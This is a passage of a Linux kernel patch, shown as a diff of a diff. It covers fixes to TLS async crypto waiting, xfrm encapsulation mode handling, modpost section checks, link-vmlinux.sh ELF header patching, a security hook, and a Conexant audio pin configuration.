++	case -EINPROGRESS:
++		break;
++	default:
++		goto unlock;
++	}
++
++	/* Wait for pending encryptions to get completed */
++	if (tls_encrypt_async_wait(ctx))
++		goto unlock;
++
++	/* Transmit if any encryptions have completed */
++	if (test_and_clear_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask)) {
++		cancel_delayed_work(&ctx->tx_work.work);
++		tls_tx_records(sk, 0);
++	}
++
++unlock:
++	release_sock(sk);
++	mutex_unlock(&tls_ctx->tx_lock);
++}
++
+ static int tls_sw_do_sendpage(struct sock *sk, struct page *page,
+ 			      int offset, size_t size, int flags)
+ {
+@@ -1595,6 +1656,7 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	} else if (out_sg) {
+ 		memcpy(sgout, out_sg, n_sgout * sizeof(*sgout));
+ 	}
++	dctx->free_sgout = !!pages;
+ 
+ 	/* Prepare and submit AEAD request */
+ 	err = tls_do_decryption(sk, sgin, sgout, dctx->iv,
+@@ -2123,16 +2185,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 
+ recv_end:
+ 	if (async) {
+-		int ret, pending;
++		int ret;
+ 
+ 		/* Wait for all previously submitted records to be decrypted */
+-		spin_lock_bh(&ctx->decrypt_compl_lock);
+-		reinit_completion(&ctx->async_wait.completion);
+-		pending = atomic_read(&ctx->decrypt_pending);
+-		spin_unlock_bh(&ctx->decrypt_compl_lock);
+-		ret = 0;
+-		if (pending)
+-			ret = crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++		ret = tls_decrypt_async_wait(ctx);
+ 		__skb_queue_purge(&ctx->async_hold);
+ 
+ 		if (ret) {
+@@ -2149,7 +2205,6 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek);
+-		decrypted += max(err, 0);
+ 	}
+ 
+ 	copied += decrypted;
+@@ -2351,16 +2406,9 @@ void tls_sw_release_resources_tx(struct sock *sk)
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+ 	struct tls_sw_context_tx *ctx = tls_sw_ctx_tx(tls_ctx);
+ 	struct tls_rec *rec, *tmp;
+-	int pending;
+ 
+ 	/* Wait for any pending async encryptions to complete */
+-	spin_lock_bh(&ctx->encrypt_compl_lock);
+-	ctx->async_notify = true;
+-	pending = atomic_read(&ctx->encrypt_pending);
+-	spin_unlock_bh(&ctx->encrypt_compl_lock);
+-
+-	if (pending)
+-		crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++	tls_encrypt_async_wait(ctx);
+ 
+ 	tls_tx_records(sk, -1);
+ 
+@@ -2513,6 +2561,48 @@ void tls_update_rx_zc_capable(struct tls_context *tls_ctx)
+ 		tls_ctx->prot_info.version != TLS_1_3_VERSION;
+ }
+ 
++static struct tls_sw_context_tx *init_ctx_tx(struct tls_context *ctx, struct sock *sk)
++{
++	struct tls_sw_context_tx *sw_ctx_tx;
++
++	if (!ctx->priv_ctx_tx) {
++		sw_ctx_tx = kzalloc(sizeof(*sw_ctx_tx), GFP_KERNEL);
++		if (!sw_ctx_tx)
++			return NULL;
++	} else {
++		sw_ctx_tx = ctx->priv_ctx_tx;
++	}
++
++	crypto_init_wait(&sw_ctx_tx->async_wait);
++	atomic_set(&sw_ctx_tx->encrypt_pending, 1);
++	INIT_LIST_HEAD(&sw_ctx_tx->tx_list);
++	INIT_DELAYED_WORK(&sw_ctx_tx->tx_work.work, tx_work_handler);
++	sw_ctx_tx->tx_work.sk = sk;
++
++	return sw_ctx_tx;
++}
++
++static struct tls_sw_context_rx *init_ctx_rx(struct tls_context *ctx)
++{
++	struct tls_sw_context_rx *sw_ctx_rx;
++
++	if (!ctx->priv_ctx_rx) {
++		sw_ctx_rx = kzalloc(sizeof(*sw_ctx_rx), GFP_KERNEL);
++		if (!sw_ctx_rx)
++			return NULL;
++	} else {
++		sw_ctx_rx = ctx->priv_ctx_rx;
++	}
++
++	crypto_init_wait(&sw_ctx_rx->async_wait);
++	atomic_set(&sw_ctx_rx->decrypt_pending, 1);
++	init_waitqueue_head(&sw_ctx_rx->wq);
++	skb_queue_head_init(&sw_ctx_rx->rx_list);
++	skb_queue_head_init(&sw_ctx_rx->async_hold);
++
++	return sw_ctx_rx;
++}
++
+ int tls_set_sw_offload(struct sock *sk, struct tls_context *ctx, int tx)
+ {
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+@@ -2534,48 +2624,22 @@ int tls_set_sw_offload(struct sock *sk, struct tls_context *ctx, int tx)
+ 	}
+ 
+ 	if (tx) {
+-		if (!ctx->priv_ctx_tx) {
+-			sw_ctx_tx = kzalloc(sizeof(*sw_ctx_tx), GFP_KERNEL);
+-			if (!sw_ctx_tx) {
+-				rc = -ENOMEM;
+-				goto out;
+-			}
+-			ctx->priv_ctx_tx = sw_ctx_tx;
+-		} else {
+-			sw_ctx_tx =
+-				(struct tls_sw_context_tx *)ctx->priv_ctx_tx;
+-		}
+-	} else {
+-		if (!ctx->priv_ctx_rx) {
+-			sw_ctx_rx = kzalloc(sizeof(*sw_ctx_rx), GFP_KERNEL);
+-			if (!sw_ctx_rx) {
+-				rc = -ENOMEM;
+-				goto out;
+-			}
+-			ctx->priv_ctx_rx = sw_ctx_rx;
+-		} else {
+-			sw_ctx_rx =
+-				(struct tls_sw_context_rx *)ctx->priv_ctx_rx;
+-		}
+-	}
++		ctx->priv_ctx_tx = init_ctx_tx(ctx, sk);
++		if (!ctx->priv_ctx_tx)
++			return -ENOMEM;
+ 
+-	if (tx) {
+-		crypto_init_wait(&sw_ctx_tx->async_wait);
+-		spin_lock_init(&sw_ctx_tx->encrypt_compl_lock);
++		sw_ctx_tx = ctx->priv_ctx_tx;
+ 		crypto_info = &ctx->crypto_send.info;
+ 		cctx = &ctx->tx;
+ 		aead = &sw_ctx_tx->aead_send;
+-		INIT_LIST_HEAD(&sw_ctx_tx->tx_list);
+-		INIT_DELAYED_WORK(&sw_ctx_tx->tx_work.work, tx_work_handler);
+-		sw_ctx_tx->tx_work.sk = sk;
+ 	} else {
+-		crypto_init_wait(&sw_ctx_rx->async_wait);
+-		spin_lock_init(&sw_ctx_rx->decrypt_compl_lock);
+-		init_waitqueue_head(&sw_ctx_rx->wq);
++		ctx->priv_ctx_rx = init_ctx_rx(ctx);
++		if (!ctx->priv_ctx_rx)
++			return -ENOMEM;
++
++		sw_ctx_rx = ctx->priv_ctx_rx;
+ 		crypto_info = &ctx->crypto_recv.info;
+ 		cctx = &ctx->rx;
+-		skb_queue_head_init(&sw_ctx_rx->rx_list);
+-		skb_queue_head_init(&sw_ctx_rx->async_hold);
+ 		aead = &sw_ctx_rx->aead_recv;
+ 	}
+ 
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 8809e668ed912..3fcddc8687ed4 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -1671,6 +1671,7 @@ void wiphy_delayed_work_queue(struct wiphy *wiphy,
+ 			      unsigned long delay)
+ {
+ 	if (!delay) {
++		del_timer(&dwork->timer);
+ 		wiphy_work_queue(wiphy, &dwork->work);
+ 		return;
+ 	}
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index ac1a645afa8df..d0320e35accbf 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -180,6 +180,8 @@ static int xfrm4_remove_beet_encap(struct xfrm_state *x, struct sk_buff *skb)
+ 	int optlen = 0;
+ 	int err = -EINVAL;
+ 
++	skb->protocol = htons(ETH_P_IP);
++
+ 	if (unlikely(XFRM_MODE_SKB_CB(skb)->protocol == IPPROTO_BEETPH)) {
+ 		struct ip_beet_phdr *ph;
+ 		int phlen;
+@@ -232,8 +234,7 @@ static int xfrm4_remove_tunnel_encap(struct xfrm_state *x, struct sk_buff *skb)
+ {
+ 	int err = -EINVAL;
+ 
+-	if (XFRM_MODE_SKB_CB(skb)->protocol != IPPROTO_IPIP)
+-		goto out;
++	skb->protocol = htons(ETH_P_IP);
+ 
+ 	if (!pskb_may_pull(skb, sizeof(struct iphdr)))
+ 		goto out;
+@@ -270,8 +271,8 @@ static int xfrm6_remove_tunnel_encap(struct xfrm_state *x, struct sk_buff *skb)
+ {
+ 	int err = -EINVAL;
+ 
+-	if (XFRM_MODE_SKB_CB(skb)->protocol != IPPROTO_IPV6)
+-		goto out;
++	skb->protocol = htons(ETH_P_IPV6);
++
+ 	if (!pskb_may_pull(skb, sizeof(struct ipv6hdr)))
+ 		goto out;
+ 
+@@ -301,6 +302,8 @@ static int xfrm6_remove_beet_encap(struct xfrm_state *x, struct sk_buff *skb)
+ 	int size = sizeof(struct ipv6hdr);
+ 	int err;
+ 
++	skb->protocol = htons(ETH_P_IPV6);
++
+ 	err = skb_cow_head(skb, size + skb->mac_len);
+ 	if (err)
+ 		goto out;
+@@ -332,22 +335,26 @@ static int xfrm6_remove_beet_encap(struct xfrm_state *x, struct sk_buff *skb)
+  */
+ static int
+ xfrm_inner_mode_encap_remove(struct xfrm_state *x,
+-			     const struct xfrm_mode *inner_mode,
+ 			     struct sk_buff *skb)
+ {
+-	switch (inner_mode->encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+-		if (inner_mode->family == AF_INET)
++		switch (x->sel.family) {
++		case AF_INET:
+ 			return xfrm4_remove_beet_encap(x, skb);
+-		if (inner_mode->family == AF_INET6)
++		case AF_INET6:
+ 			return xfrm6_remove_beet_encap(x, skb);
++		}
+ 		break;
+ 	case XFRM_MODE_TUNNEL:
+-		if (inner_mode->family == AF_INET)
++		switch (XFRM_MODE_SKB_CB(skb)->protocol) {
++		case IPPROTO_IPIP:
+ 			return xfrm4_remove_tunnel_encap(x, skb);
+-		if (inner_mode->family == AF_INET6)
++		case IPPROTO_IPV6:
+ 			return xfrm6_remove_tunnel_encap(x, skb);
+ 		break;
++		}
++		return -EINVAL;
+ 	}
+ 
+ 	WARN_ON_ONCE(1);
+@@ -356,9 +363,7 @@ xfrm_inner_mode_encap_remove(struct xfrm_state *x,
+ 
+ static int xfrm_prepare_input(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	const struct xfrm_mode *inner_mode = &x->inner_mode;
+-
+-	switch (x->outer_mode.family) {
++	switch (x->props.family) {
+ 	case AF_INET:
+ 		xfrm4_extract_header(skb);
+ 		break;
+@@ -370,25 +375,7 @@ static int xfrm_prepare_input(struct xfrm_state *x, struct sk_buff *skb)
+ 		return -EAFNOSUPPORT;
+ 	}
+ 
+-	if (x->sel.family == AF_UNSPEC) {
+-		inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
+-		if (!inner_mode)
+-			return -EAFNOSUPPORT;
+-	}
+-
+-	switch (inner_mode->family) {
+-	case AF_INET:
+-		skb->protocol = htons(ETH_P_IP);
+-		break;
+-	case AF_INET6:
+-		skb->protocol = htons(ETH_P_IPV6);
+-		break;
+-	default:
+-		WARN_ON_ONCE(1);
+-		break;
+-	}
+-
+-	return xfrm_inner_mode_encap_remove(x, inner_mode, skb);
++	return xfrm_inner_mode_encap_remove(x, skb);
+ }
+ 
+ /* Remove encapsulation header.
+@@ -434,17 +421,16 @@ static int xfrm6_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ }
+ 
+ static int xfrm_inner_mode_input(struct xfrm_state *x,
+-				 const struct xfrm_mode *inner_mode,
+ 				 struct sk_buff *skb)
+ {
+-	switch (inner_mode->encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 	case XFRM_MODE_TUNNEL:
+ 		return xfrm_prepare_input(x, skb);
+ 	case XFRM_MODE_TRANSPORT:
+-		if (inner_mode->family == AF_INET)
++		if (x->props.family == AF_INET)
+ 			return xfrm4_transport_input(x, skb);
+-		if (inner_mode->family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_transport_input(x, skb);
+ 		break;
+ 	case XFRM_MODE_ROUTEOPTIMIZATION:
+@@ -462,7 +448,6 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ {
+ 	const struct xfrm_state_afinfo *afinfo;
+ 	struct net *net = dev_net(skb->dev);
+-	const struct xfrm_mode *inner_mode;
+ 	int err;
+ 	__be32 seq;
+ 	__be32 seq_hi;
+@@ -492,7 +477,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 			goto drop;
+ 		}
+ 
+-		family = x->outer_mode.family;
++		family = x->props.family;
+ 
+ 		/* An encap_type of -1 indicates async resumption. */
+ 		if (encap_type == -1) {
+@@ -676,17 +661,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 
+ 		XFRM_MODE_SKB_CB(skb)->protocol = nexthdr;
+ 
+-		inner_mode = &x->inner_mode;
+-
+-		if (x->sel.family == AF_UNSPEC) {
+-			inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
+-			if (inner_mode == NULL) {
+-				XFRM_INC_STATS(net, LINUX_MIB_XFRMINSTATEMODEERROR);
+-				goto drop;
+-			}
+-		}
+-
+-		if (xfrm_inner_mode_input(x, inner_mode, skb)) {
++		if (xfrm_inner_mode_input(x, skb)) {
+ 			XFRM_INC_STATS(net, LINUX_MIB_XFRMINSTATEMODEERROR);
+ 			goto drop;
+ 		}
+@@ -701,7 +676,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 		 * transport mode so the outer address is identical.
+ 		 */
+ 		daddr = &x->id.daddr;
+-		family = x->outer_mode.family;
++		family = x->props.family;
+ 
+ 		err = xfrm_parse_spi(skb, nexthdr, &spi, &seq);
+ 		if (err < 0) {
+@@ -732,7 +707,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 
+ 		err = -EAFNOSUPPORT;
+ 		rcu_read_lock();
+-		afinfo = xfrm_state_afinfo_get_rcu(x->inner_mode.family);
++		afinfo = xfrm_state_afinfo_get_rcu(x->props.family);
+ 		if (likely(afinfo))
+ 			err = afinfo->transport_finish(skb, xfrm_gro || async);
+ 		rcu_read_unlock();
+diff --git a/net/xfrm/xfrm_output.c b/net/xfrm/xfrm_output.c
+index 9a5e79a38c679..07a7ee43b8ae2 100644
+--- a/net/xfrm/xfrm_output.c
++++ b/net/xfrm/xfrm_output.c
+@@ -414,7 +414,7 @@ static int xfrm4_prepare_output(struct xfrm_state *x, struct sk_buff *skb)
+ 	IPCB(skb)->flags |= IPSKB_XFRM_TUNNEL_SIZE;
+ 	skb->protocol = htons(ETH_P_IP);
+ 
+-	switch (x->outer_mode.encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 		return xfrm4_beet_encap_add(x, skb);
+ 	case XFRM_MODE_TUNNEL:
+@@ -437,7 +437,7 @@ static int xfrm6_prepare_output(struct xfrm_state *x, struct sk_buff *skb)
+ 	skb->ignore_df = 1;
+ 	skb->protocol = htons(ETH_P_IPV6);
+ 
+-	switch (x->outer_mode.encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 		return xfrm6_beet_encap_add(x, skb);
+ 	case XFRM_MODE_TUNNEL:
+@@ -453,22 +453,22 @@ static int xfrm6_prepare_output(struct xfrm_state *x, struct sk_buff *skb)
+ 
+ static int xfrm_outer_mode_output(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	switch (x->outer_mode.encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 	case XFRM_MODE_TUNNEL:
+-		if (x->outer_mode.family == AF_INET)
++		if (x->props.family == AF_INET)
+ 			return xfrm4_prepare_output(x, skb);
+-		if (x->outer_mode.family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_prepare_output(x, skb);
+ 		break;
+ 	case XFRM_MODE_TRANSPORT:
+-		if (x->outer_mode.family == AF_INET)
++		if (x->props.family == AF_INET)
+ 			return xfrm4_transport_output(x, skb);
+-		if (x->outer_mode.family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_transport_output(x, skb);
+ 		break;
+ 	case XFRM_MODE_ROUTEOPTIMIZATION:
+-		if (x->outer_mode.family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_ro_output(x, skb);
+ 		WARN_ON_ONCE(1);
+ 		break;
+@@ -866,21 +866,10 @@ static int xfrm6_extract_output(struct xfrm_state *x, struct sk_buff *skb)
+ 
+ static int xfrm_inner_extract_output(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	const struct xfrm_mode *inner_mode;
+-
+-	if (x->sel.family == AF_UNSPEC)
+-		inner_mode = xfrm_ip2inner_mode(x,
+-				xfrm_af2proto(skb_dst(skb)->ops->family));
+-	else
+-		inner_mode = &x->inner_mode;
+-
+-	if (inner_mode == NULL)
+-		return -EAFNOSUPPORT;
+-
+-	switch (inner_mode->family) {
+-	case AF_INET:
++	switch (skb->protocol) {
++	case htons(ETH_P_IP):
+ 		return xfrm4_extract_output(x, skb);
+-	case AF_INET6:
++	case htons(ETH_P_IPV6):
+ 		return xfrm6_extract_output(x, skb);
+ 	}
+ 
+diff --git a/samples/bpf/asm_goto_workaround.h b/samples/bpf/asm_goto_workaround.h
+index 7048bb3594d65..634e81d83efd9 100644
+--- a/samples/bpf/asm_goto_workaround.h
++++ b/samples/bpf/asm_goto_workaround.h
+@@ -4,14 +4,14 @@
+ #define __ASM_GOTO_WORKAROUND_H
+ 
+ /*
+- * This will bring in asm_volatile_goto and asm_inline macro definitions
++ * This will bring in asm_goto_output and asm_inline macro definitions
+  * if enabled by compiler and config options.
+  */
+ #include <linux/types.h>
+ 
+-#ifdef asm_volatile_goto
+-#undef asm_volatile_goto
+-#define asm_volatile_goto(x...) asm volatile("invalid use of asm_volatile_goto")
++#ifdef asm_goto_output
++#undef asm_goto_output
++#define asm_goto_output(x...) asm volatile("invalid use of asm_goto_output")
+ #endif
+ 
+ /*
+diff --git a/scripts/Makefile.modpost b/scripts/Makefile.modpost
+index e41dee64d429c..39aea753d0bdc 100644
+--- a/scripts/Makefile.modpost
++++ b/scripts/Makefile.modpost
+@@ -44,6 +44,7 @@ modpost-args =										\
+ 	$(if $(CONFIG_SECTION_MISMATCH_WARN_ONLY),,-E)					\
+ 	$(if $(KBUILD_NSDEPS),-d $(MODULES_NSDEPS))					\
+ 	$(if $(CONFIG_MODULE_ALLOW_MISSING_NAMESPACE_IMPORTS)$(KBUILD_NSDEPS),-N)	\
++	$(if $(findstring 1, $(KBUILD_EXTRA_WARN)),-W)					\
+ 	-o $@
+ 
+ # 'make -i -k' ignores compile errors, and builds as many modules as possible.
+diff --git a/scripts/checkpatch.pl b/scripts/checkpatch.pl
+index 1e5e66ae5a522..ecf4250b0d2d2 100755
+--- a/scripts/checkpatch.pl
++++ b/scripts/checkpatch.pl
+@@ -4971,7 +4971,7 @@ sub process {
+ 				if|for|while|switch|return|case|
+ 				volatile|__volatile__|
+ 				__attribute__|format|__extension__|
+-				asm|__asm__)$/x)
++				asm|__asm__|scoped_guard)$/x)
+ 			{
+ 			# cpp #define statements have non-optional spaces, ie
+ 			# if there is a space between the name and the open
+diff --git a/scripts/link-vmlinux.sh b/scripts/link-vmlinux.sh
+index 32e573943cf03..458b2948b580d 100755
+--- a/scripts/link-vmlinux.sh
++++ b/scripts/link-vmlinux.sh
+@@ -135,8 +135,13 @@ gen_btf()
+ 	${OBJCOPY} --only-section=.BTF --set-section-flags .BTF=alloc,readonly \
+ 		--strip-all ${1} ${2} 2>/dev/null
+ 	# Change e_type to ET_REL so that it can be used to link final vmlinux.
+-	# Unlike GNU ld, lld does not allow an ET_EXEC input.
+-	printf '\1' | dd of=${2} conv=notrunc bs=1 seek=16 status=none
++	# GNU ld 2.35+ and lld do not allow an ET_EXEC input.
++	if is_enabled CONFIG_CPU_BIG_ENDIAN; then
++		et_rel='\0\1'
++	else
++		et_rel='\1\0'
++	fi
++	printf "${et_rel}" | dd of=${2} conv=notrunc bs=1 seek=16 status=none
+ }
+ 
+ # Create ${2} .S file with all symbols from the ${1} object file
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index e6be7fc2625fd..686eed37f9781 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -41,6 +41,8 @@ static bool allow_missing_ns_imports;
+ 
+ static bool error_occurred;
+ 
++static bool extra_warn;
++
+ /*
+  * Cut off the warnings when there are too many. This typically occurs when
+  * vmlinux is missing. ('make modules' without building vmlinux.)
+@@ -809,7 +811,7 @@ static void check_section(const char *modname, struct elf_info *elf,
+ #define ALL_INIT_TEXT_SECTIONS \
+ 	".init.text", ".meminit.text"
+ #define ALL_EXIT_TEXT_SECTIONS \
+-	".exit.text", ".memexit.text"
++	".exit.text"
+ 
+ #define ALL_PCI_INIT_SECTIONS	\
+ 	".pci_fixup_early", ".pci_fixup_header", ".pci_fixup_final", \
+@@ -817,23 +819,22 @@ static void check_section(const char *modname, struct elf_info *elf,
+ 	".pci_fixup_resume_early", ".pci_fixup_suspend"
+ 
+ #define ALL_XXXINIT_SECTIONS MEM_INIT_SECTIONS
+-#define ALL_XXXEXIT_SECTIONS MEM_EXIT_SECTIONS
+ 
+ #define ALL_INIT_SECTIONS INIT_SECTIONS, ALL_XXXINIT_SECTIONS
+-#define ALL_EXIT_SECTIONS EXIT_SECTIONS, ALL_XXXEXIT_SECTIONS
++#define ALL_EXIT_SECTIONS EXIT_SECTIONS
+ 
+ #define DATA_SECTIONS ".data", ".data.rel"
+-#define TEXT_SECTIONS ".text", ".text.unlikely", ".sched.text", \
+-		".kprobes.text", ".cpuidle.text", ".noinstr.text"
++#define TEXT_SECTIONS ".text", ".text.*", ".sched.text", \
++		".kprobes.text", ".cpuidle.text", ".noinstr.text", \
++		".ltext", ".ltext.*"
+ #define OTHER_TEXT_SECTIONS ".ref.text", ".head.text", ".spinlock.text", \
+-		".fixup", ".entry.text", ".exception.text", ".text.*", \
++		".fixup", ".entry.text", ".exception.text", \
+ 		".coldtext", ".softirqentry.text"
+ 
+ #define INIT_SECTIONS      ".init.*"
+ #define MEM_INIT_SECTIONS  ".meminit.*"
+ 
+ #define EXIT_SECTIONS      ".exit.*"
+-#define MEM_EXIT_SECTIONS  ".memexit.*"
+ 
+ #define ALL_TEXT_SECTIONS  ALL_INIT_TEXT_SECTIONS, ALL_EXIT_TEXT_SECTIONS, \
+ 		TEXT_SECTIONS, OTHER_TEXT_SECTIONS
+@@ -862,7 +863,6 @@ enum mismatch {
+ 	TEXT_TO_ANY_EXIT,
+ 	DATA_TO_ANY_EXIT,
+ 	XXXINIT_TO_SOME_INIT,
+-	XXXEXIT_TO_SOME_EXIT,
+ 	ANY_INIT_TO_ANY_EXIT,
+ 	ANY_EXIT_TO_ANY_INIT,
+ 	EXPORT_TO_INIT_EXIT,
+@@ -937,12 +937,6 @@ static const struct sectioncheck sectioncheck[] = {
+ 	.bad_tosec = { INIT_SECTIONS, NULL },
+ 	.mismatch = XXXINIT_TO_SOME_INIT,
+ },
+-/* Do not reference exit code/data from memexit code/data */
+-{
+-	.fromsec = { ALL_XXXEXIT_SECTIONS, NULL },
+-	.bad_tosec = { EXIT_SECTIONS, NULL },
+-	.mismatch = XXXEXIT_TO_SOME_EXIT,
+-},
+ /* Do not use exit code/data from init code */
+ {
+ 	.fromsec = { ALL_INIT_SECTIONS, NULL },
+@@ -1085,9 +1079,20 @@ static int secref_whitelist(const struct sectioncheck *mismatch,
+ 				    "*_console")))
+ 		return 0;
+ 
+-	/* symbols in data sections that may refer to meminit/exit sections */
++	/* symbols in data sections that may refer to meminit sections */
+ 	if (match(fromsec, PATTERNS(DATA_SECTIONS)) &&
+-	    match(tosec, PATTERNS(ALL_XXXINIT_SECTIONS, ALL_EXIT_SECTIONS)) &&
++	    match(tosec, PATTERNS(ALL_XXXINIT_SECTIONS)) &&
++	    match(fromsym, PATTERNS("*driver")))
++		return 0;
++
++	/*
++	 * symbols in data sections must not refer to .exit.*, but there are
++	 * quite a few offenders, so hide these unless for W=1 builds until
++	 * these are fixed.
++	 */
++	if (!extra_warn &&
++	    match(fromsec, PATTERNS(DATA_SECTIONS)) &&
++	    match(tosec, PATTERNS(EXIT_SECTIONS)) &&
+ 	    match(fromsym, PATTERNS("*driver")))
+ 		return 0;
+ 
+@@ -1254,7 +1259,6 @@ static void report_sec_mismatch(const char *modname,
+ 	case TEXT_TO_ANY_EXIT:
+ 	case DATA_TO_ANY_EXIT:
+ 	case XXXINIT_TO_SOME_INIT:
+-	case XXXEXIT_TO_SOME_EXIT:
+ 	case ANY_INIT_TO_ANY_EXIT:
+ 	case ANY_EXIT_TO_ANY_INIT:
+ 		warn("%s: section mismatch in reference: %s (section: %s) -> %s (section: %s)\n",
+@@ -2290,7 +2294,7 @@ int main(int argc, char **argv)
+ 	LIST_HEAD(dump_lists);
+ 	struct dump_list *dl, *dl2;
+ 
+-	while ((opt = getopt(argc, argv, "ei:mnT:o:awENd:")) != -1) {
++	while ((opt = getopt(argc, argv, "ei:mnT:o:aWwENd:")) != -1) {
+ 		switch (opt) {
+ 		case 'e':
+ 			external_module = true;
+@@ -2315,6 +2319,9 @@ int main(int argc, char **argv)
+ 		case 'T':
+ 			files_source = optarg;
+ 			break;
++		case 'W':
++			extra_warn = true;
++			break;
+ 		case 'w':
+ 			warn_unresolved = true;
+ 			break;
+diff --git a/scripts/mod/sumversion.c b/scripts/mod/sumversion.c
+index 6bf9caca09684..a72e6cf61a1f0 100644
+--- a/scripts/mod/sumversion.c
++++ b/scripts/mod/sumversion.c
+@@ -326,7 +326,12 @@ static int parse_source_files(const char *objfile, struct md4_ctx *md)
+ 
+ 	/* Sum all files in the same dir or subdirs. */
+ 	while ((line = get_line(&pos))) {
+-		char* p = line;
++		char* p;
++
++		/* trim the leading spaces away */
++		while (isspace(*line))
++			line++;
++		p = line;
+ 
+ 		if (strncmp(line, "source_", sizeof("source_")-1) == 0) {
+ 			p = strrchr(line, ' ');
+diff --git a/security/apparmor/include/lib.h b/security/apparmor/include/lib.h
+index f42359f58eb58..d468c8b90298d 100644
+--- a/security/apparmor/include/lib.h
++++ b/security/apparmor/include/lib.h
+@@ -226,7 +226,7 @@ void aa_policy_destroy(struct aa_policy *policy);
+  */
+ #define fn_label_build(L, P, GFP, FN)					\
+ ({									\
+-	__label__ __cleanup, __done;					\
++	__label__ __do_cleanup, __done;					\
+ 	struct aa_label *__new_;					\
+ 									\
+ 	if ((L)->size > 1) {						\
+@@ -244,7 +244,7 @@ void aa_policy_destroy(struct aa_policy *policy);
+ 			__new_ = (FN);					\
+ 			AA_BUG(!__new_);				\
+ 			if (IS_ERR(__new_))				\
+-				goto __cleanup;				\
++				goto __do_cleanup;			\
+ 			__lvec[__j++] = __new_;				\
+ 		}							\
+ 		for (__j = __count = 0; __j < (L)->size; __j++)		\
+@@ -266,7 +266,7 @@ void aa_policy_destroy(struct aa_policy *policy);
+ 			vec_cleanup(profile, __pvec, __count);		\
+ 		} else							\
+ 			__new_ = NULL;					\
+-__cleanup:								\
++__do_cleanup:								\
+ 		vec_cleanup(label, __lvec, (L)->size);			\
+ 	} else {							\
+ 		(P) = labels_profile(L);				\
+diff --git a/security/security.c b/security/security.c
+index fc15b963e1028..1b504c296551c 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -2186,7 +2186,19 @@ EXPORT_SYMBOL(security_inode_setsecctx);
+ 
+ int security_inode_getsecctx(struct inode *inode, void **ctx, u32 *ctxlen)
+ {
+-	return call_int_hook(inode_getsecctx, -EOPNOTSUPP, inode, ctx, ctxlen);
++	struct security_hook_list *hp;
++	int rc;
++
++	/*
++	 * Only one module will provide a security context.
++	 */
++	hlist_for_each_entry(hp, &security_hook_heads.inode_getsecctx, list) {
++		rc = hp->hook.inode_getsecctx(inode, ctx, ctxlen);
++		if (rc != LSM_RET_DEFAULT(inode_getsecctx))
++			return rc;
++	}
++
++	return LSM_RET_DEFAULT(inode_getsecctx);
+ }
+ EXPORT_SYMBOL(security_inode_getsecctx);
+ 
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index e8819e8a98763..e8209178d87bb 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -344,6 +344,7 @@ enum {
+ 	CXT_FIXUP_HP_ZBOOK_MUTE_LED,
+ 	CXT_FIXUP_HEADSET_MIC,
+ 	CXT_FIXUP_HP_MIC_NO_PRESENCE,
++	CXT_PINCFG_SWS_JS201D,
+ };
+ 
+ /* for hda_fixup_thinkpad_acpi() */
+@@ -841,6 +842,17 @@ static const struct hda_pintbl cxt_pincfg_lemote[] = {
+ 	{}
+ };
+ 
++/* SuoWoSi/South-holding JS201D with sn6140 */
++static const struct hda_pintbl cxt_pincfg_sws_js201d[] = {
++	{ 0x16, 0x03211040 }, /* hp out */
++	{ 0x17, 0x91170110 }, /* SPK/Class_D */
++	{ 0x18, 0x95a70130 }, /* Internal mic */
++	{ 0x19, 0x03a11020 }, /* Headset Mic */
++	{ 0x1a, 0x40f001f0 }, /* Not used */
++	{ 0x21, 0x40f001f0 }, /* Not used */
++	{}
++};
++
+ static const struct hda_fixup cxt_fixups[] = {
+ 	[CXT_PINCFG_LENOVO_X200] = {
+ 		.type = HDA_FIXUP_PINS,
+@@ -996,6 +1008,10 @@ static const struct hda_fixup cxt_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = CXT_FIXUP_HEADSET_MIC,
+ 	},
++	[CXT_PINCFG_SWS_JS201D] = {
++		.type = HDA_FIXUP_PINS,
